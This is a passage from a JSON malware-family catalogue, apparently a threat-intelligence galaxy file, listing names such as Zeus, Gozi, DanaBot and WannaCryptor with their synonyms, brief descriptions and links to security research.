"https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/"
]
}
},
{
"uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a",
"value": "Zeus",
"description": "",
"meta": {
"synonyms": [
"Zbot"
],
"type": [],
"refs": [
"https://zeustracker.abuse.ch/monitor.php",
"http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html",
"http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
"http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
"http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
"http://eternal-todo.com/blog/new-zeus-binary",
"http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
"https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
"https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
"https://www.mnin.org/write/ZeusMalware.pdf",
"https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
"http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html",
"http://eternal-todo.com/blog/zeus-spreading-facebook",
"http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
"http://eternal-todo.com/blog/detecting-zeus",
"https://www.secureworks.com/research/zeus?threat=zeus",
"http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html"
]
}
},
{
"uuid": "467ee29c-317f-481a-a77c-69961eb88c4d",
"value": "Simda",
"description": "",
"meta": {
"synonyms": [
"iBank"
],
"type": [],
"refs": [
"https://secrary.com/ReversingMalware/iBank/"
]
}
},
{
"uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7",
"value": "MacSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service"
]
}
},
{
"uuid": "118ced99-5942-497f-885a-2b25d0569b4b",
"value": "Matrix Ransom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3",
"value": "Shifu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/"
]
}
},
{
"uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0",
"value": "Slocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/"
]
}
},
{
"uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a",
"value": "DanaBot",
"description": "Proofpoint describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot's modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/",
"https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0"
]
}
},
{
"uuid": "2c51a717-726b-4813-9fcc-1265694b128e",
"value": "Jaff",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://malware-traffic-analysis.net/2017/05/16/index.html",
"https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart",
"http://blog.talosintelligence.com/2017/05/jaff-ransomware.html"
]
}
},
{
"uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf",
"value": "CryLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826",
"value": "MazarBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html",
"https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/"
]
}
},
{
"uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8",
"value": "Cobian RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html",
"https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat"
]
}
},
{
"uuid": "59717468-271e-4d15-859a-130681c17ddb",
"value": "Matrix Banker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/"
]
}
},
{
"uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6",
"value": "HeroRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/"
]
}
},
{
"uuid": "5c5beab9-614c-4c86-b369-086234ddb43c",
"value": "PowerWare",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats"
]
}
},
{
"uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933",
"value": "FileIce",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/"
]
}
},
{
"uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3",
"value": "Ice IX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/",
"https://securelist.com/ice-ix-not-cool-at-all/29111/",
"https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus"
]
}
},
{
"uuid": "d26b5518-8d7f-41a6-b539-231e4962853e",
"value": "Komplex",
"description": "",
"meta": {
"synonyms": [
"JHUHUGIT",
"JKEYSKW",
"SedUploader"
],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://objective-see.com/blog/blog_0x16.html",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
"http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
"https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/"
]
}
},
{
"uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c",
"value": "Gozi",
"description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, who borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and from some other kits. Gozi v1.0 thus had a formgrabber module and is often classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM DLL version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and to Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.",
"meta": {
"synonyms": [
"Ursnif",
"Snifula",
"Gozi CRM",
"Papras",
"CRM"
],
"type": [],
"refs": [
"http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html",
"https://www.secureworks.com/research/gozi",
"https://lokalhost.pl/gozi_tree.txt",
"https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007",
"http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/"
]
}
},
{
"uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92",
"value": "Gameover DGA",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c",
"value": "Radamant",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/"
]
}
},
{
"uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1",
"value": "Winnti",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/TKCERT/winnti-suricata-lua",
"http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/",
"https://github.com/TKCERT/winnti-nmap-script",
"https://www.protectwise.com/blog/winnti-evolution-going-open-source.html",
"https://github.com/TKCERT/winnti-detector",
"http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/"
]
}
},
{
"uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd",
"value": "QRat",
"description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.",
"meta": {
"synonyms": [
"Quaverse RAT"
],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/",
"https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market",
"https://www.digitrustgroup.com/java-rat-qrat/"
]
}
},
{
"uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5",
"value": "Derusbi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf",
"http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf",
"https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/"
]
}
},
{
"uuid": "dcabea75-a433-4157-bb7a-be76de3026ac",
"value": "Careto",
"description": "",
"meta": {
"synonyms": [
"Appetite",
"Mask"
],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed"
]
}
},
{
"uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8",
"value": "Triada",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/",
"https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/",
"https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/",
"https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/",
"http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html"
]
}
},
{
"uuid": "c4490972-3403-4043-9d61-899c0a440940",
"value": "EquationDrug",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/inside-the-equationdrug-espionage-platform/69203/",
"https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf",
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
"http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html"
]
}
},
{
"uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500",
"value": "elf.vpnfilter",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected",
"https://blog.talosintelligence.com/2018/05/VPNFilter.html",
"https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1",
"https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware",
"https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/"
]
}
},
{
"uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840",
"value": "Penquin Turla",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf",
"https://twitter.com/juanandres_gs/status/944741575837528064",
"https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf"
]
}
},
{
"uuid": "3afecded-3461-45f9-8159-e8328e56a916",
"value": "IDKEY",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://isc.sans.edu/diary/22766"
]
}
},
{
"uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50",
"value": "Catchamas",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
]
}
},
{
"uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6",
"value": "BillGates",
"description": "BillGates is modular malware, supposedly of Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. BillGates is often delivered with one or more backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/versatile-ddos-trojan-for-linux/64361/",
"https://habrahabr.ru/post/213973/",
"https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf"
]
}
},
{
"uuid": "66781866-f064-467d-925d-5e5f290352f0",
"value": "Feodo",
"description": "",
"meta": {
"synonyms": [
"Bugat",
"Cridex"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html",
"https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
"http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html"
]
}
},
{
"uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a",
"value": "XSLCmd",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html"
]
}
},
{
"uuid": "df320366-7970-4af0-b1f4-9f9492dede53",
"value": "Mamba",
"description": "",
"meta": {
"synonyms": [
"HDDCryptor",
"DiskCryptor"
],
"type": [],
"refs": [
"https://securelist.com/the-return-of-mamba-ransomware/79403/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/"
]
}
},
{
"uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2",
"value": "Downdelph",
"description": "",
"meta": {
"synonyms": [
"DELPHACY"
],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf"
]
}
},
{
"uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13",
"value": "AscentLoader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5",
"value": "Mutabaha",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://vms.drweb.ru/virus/?_is=1&i=8477920"
]
}
},
{
"uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe",
"value": "UrlZone",
"description": "",
"meta": {
"synonyms": [
"Shiotob",
"Bebloh"
],
"type": [],
"refs": [
"https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations",
"https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/",
"https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
"https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html",
"https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/",
"https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
"https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/"
]
}
},
{
"uuid": "ac2af862-34f4-4ced-9247-e3eeef1ad7d9",
"value": "WireLurker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html",
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
]
}
},
{
"uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad",
"value": "Chrysaor",
"description": "",
"meta": {
"synonyms": [
"JigglyPuff",
"Pegasus"
],
"type": [],
"refs": [
"https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
"https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
"https://media.ccc.de/v/33c3-7901-pegasus_internals",
"https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html"
]
}
},
{
"uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a",
"value": "Cerbu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6",
"value": "WannaCryptor",
"description": "",
"meta": {
"synonyms": [
"Wana Decrypt0r",
"Wcry",
"WannaCry"
],
"type": [],
"refs": [
"https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today",
"https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
"http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html",
"https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168",
"https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e",
"https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58",
"https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984",
"https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/",
"https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/",
"https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html",
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
"https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign",
"https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/",
"https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/",
"http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/",
"https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d"
]
}
},
{
"uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956",
"value": "Unidentified 013 (Korean)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/02/korean-maldoc.html"
]
}
},
{
"uuid": "7fd96553-4c78-43de-824f-82645ed4fac5",
"value": "Ordinypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/",
"https://www.gdata.de/blog/2017/11/30151-ordinypt"
]
}
},
{
"uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb",
"value": "xxmm",
"description": "",
"meta": {
"synonyms": [
"ShadowWalker"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
]
}
},
{
"uuid": "805b99d1-233d-4f7f-b343-440e5d507494",
"value": "Rambo",
"description": "",
"meta": {
"synonyms": [
"brebsd"
],
"type": [],
"refs": [
"https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor"
]
}
},
{
"uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf",
"value": "Arefty",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/"
]
}
},
{
"uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd",
"value": "FireCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/"
]
}
},
{
"uuid": "f9b3757e-99c7-4999-8b79-87609407f895",
"value": "Kuluoz",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872",
"value": "LockPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/",
"https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html",
"https://www.cyberbit.com/new-lockpos-malware-injection-technique/"
]
}
},
{
"uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b",
"value": "Unidentified 028",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "21540126-d0bb-42ce-9b93-341fedb94cac",
"value": "Tsunami",
"description": "",
"meta": {
"synonyms": [
"Radiation",
"Amnesia"
],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
"http://get.cyberx-labs.com/radiation-report",
"https://www.8ackprotect.com/blog/big_brother_is_attacking_you"
]
}
},
{
"uuid": "c8e8392f-883e-412e-9b0b-02137d0875da",
"value": "Nymaim2",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/"
]
}
},
{
"uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4",
"value": "Nanocore RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
"https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/"
]
}
},
{
"uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d",
"value": "homefry",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
]
}
},
{
"uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf",
"value": "Coldroot RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x2A.html"
]
}
},
{
"uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070",
"value": "iSpy Keylogger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.zscaler.com/blogs/research/ispy-keylogger"
]
}
},
{
"uuid": "48cb12ee-c60a-46cd-b376-39226027c616",
"value": "Mewsei",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187",
"value": "ATMSpitter",
"description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf",
"https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf"
]
}
},
{
"uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8",
"value": "Patcher",
"description": "",
"meta": {
"synonyms": [
"Findzip"
],
"type": [],
"refs": [
"http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/"
]
}
},
{
"uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09",
"value": "Cueisfry",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761"
]
}
},
{
"uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5",
"value": "Unidentified 051",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/CDA/status/1014144988454772736"
]
}
},
{
"uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47",
"value": "Bundestrojaner",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html",
"http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf"
]
}
},
{
"uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17",
"value": "GreenShaitan",
"description": "",
"meta": {
"synonyms": [
"eoehttp"
],
"type": [],
"refs": [
"https://blog.cylance.com/spear-a-threat-actor-resurfaces"
]
}
},
{
"uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da",
"value": "Misfox",
"description": "",
"meta": {
"synonyms": [
"ModPack",
"MixFox"
],
"type": [],
"refs": []
}
},
{
"uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3",
"value": "H1N1 Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities"
]
}
},
{
"uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba",
"value": "Client Maximus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/"
]
}
},
{
"uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3",
"value": "ZooPark",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf",
"https://securelist.com/whos-who-in-the-zoo/85394"
]
}
},
{
"uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a",
"value": "SamSam",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
"https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/",
"https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/",
"http://blog.talosintel.com/2016/03/samsam-ransomware.html",
"http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html"
]
}
},
{
"uuid": "7d69892e-d582-4545-8798-4a9a84a821ea",
"value": "Kelihos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/",
"https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
"https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
"https://en.wikipedia.org/wiki/Kelihos_botnet"
]
}
},
{
"uuid": "826c31ca-2617-47e4-b236-205da3881182",
"value": "Reaver",
"description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
]
}
},
{
"uuid": "37f66fcc-e093-4d97-902d-c96602a7d234",
"value": "owaauth",
"description": "",
"meta": {
"synonyms": [
"luckyowa"
],
"type": [],
"refs": [
"https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/"
]
}
},
{
"uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e",
"value": "Trochilus RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/5loyd/trochilus/",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
]
}
},
{
"uuid": "587eff78-47be-4022-a1b5-7857340a9ab2",
"value": "AthenaGo RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintel.com/2017/02/athena-go.html"
]
}
},
{
"uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63",
"value": "SquirtDanger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/"
]
}
},
{
"uuid": "ba014661-d1d4-4a69-a698-9f4120de9260",
"value": "Unidentified 035",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f",
"value": "Volgmer",
"description": "",
